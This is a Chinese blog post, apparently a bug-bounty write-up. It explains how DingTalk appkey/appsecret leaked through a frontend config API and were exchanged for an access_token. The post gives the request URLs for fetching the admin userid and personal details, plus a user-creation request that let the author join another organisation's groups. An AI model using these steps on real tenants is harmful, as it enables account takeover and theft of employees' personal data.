声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
兄弟们,系我,暗月最深情的徒弟,跟着月师傅苦学两年半的挖洞练习生。接下来跟大家分享一个奇技淫巧,望大家给月师傅公众号(搜:moon_sec)和我点点关注。
前言
现在很多大厂都上云了,越来越云管理,所以会出现一些ak密钥泄露之类的
0x02:好基友已经给出了提示,找一些api接口,然后废话不多说,直接前端源代码搜索api接口
看我的f12大法
00X3:
毫无疑问/m/dingding/api/getDDConfig这个路径看起来就很牛逼
应该是获取配置文件,然后根据js里面的提示构造请求
类似这样子
http://XXX.XXXX.XXX:8000/m/dingding/api/getDDConfig?corpId=XXXXXX&modelType=parking
哦吼,直接获取到一些信息,看起来像密钥 里面还要钉钉网址
00X4:心一想,莫非是钉钉的配置信息ak,然后直接根据钉钉的接口文档尝试一下
查询ak接口:
https://oapi.dingtalk.com/gettoken?appkey=APPKEY&appsecret=APPSECRET
我去,通过api泄露的appkey和appsecret信息查询接口成功了,nb
00X5:美滋滋的直接把漏洞提交到src平台,估计有个千把块钱,这不是妥妥的高危,获取到access_token相当于接管了钉钉,谁知道审核人员发来评论说让我进一步利用,我真的是????满脸问号,算了估计审核不会利用
00X6:接下来就是获取access_token密钥后渗透,接下来看我表演 兄弟们
1.钉钉获取管理员userid的接口
https://oapi.dingtalk.com/user/get_admin?access_token=XXXXXXXXXXXXXXXXXXXX
2.钉钉通过获取管理员userid参数信息得到个人敏感信息
https://oapi.dingtalk.com/user/get?access_token=XXXXXXXXXXXXXXXXXXXXXXXXX
&userid=dd
3.在钉钉添加部门成员api接口,这个操作慎用呀
POSThttps://oapi.dingtalk.com/user/create?access_token=
Body:
{
"userid": "",
"name": "",
"orderInDepts" : "",
"department": "",
"position": "",
"mobile": "",
"tel" : "",
"workPlace" :"",
"remark" : "",
"email": "",
"orgEmail": "",
"jobnumber": "",
"isHide": false,
"isSenior": false,
}
我不小心添加之后直接进去到别人钉钉群里面去了,这不妥妥的被抓
00X7:利用到这里差不多了,具体可看钉钉的接口文档
https://open.dingtalk.com/document/isvapp-server/queries-department-user-details-1
妈的 因为是第三方开发的信息,被降级了
本人爱好喜欢听人吹nb,欢迎前来交流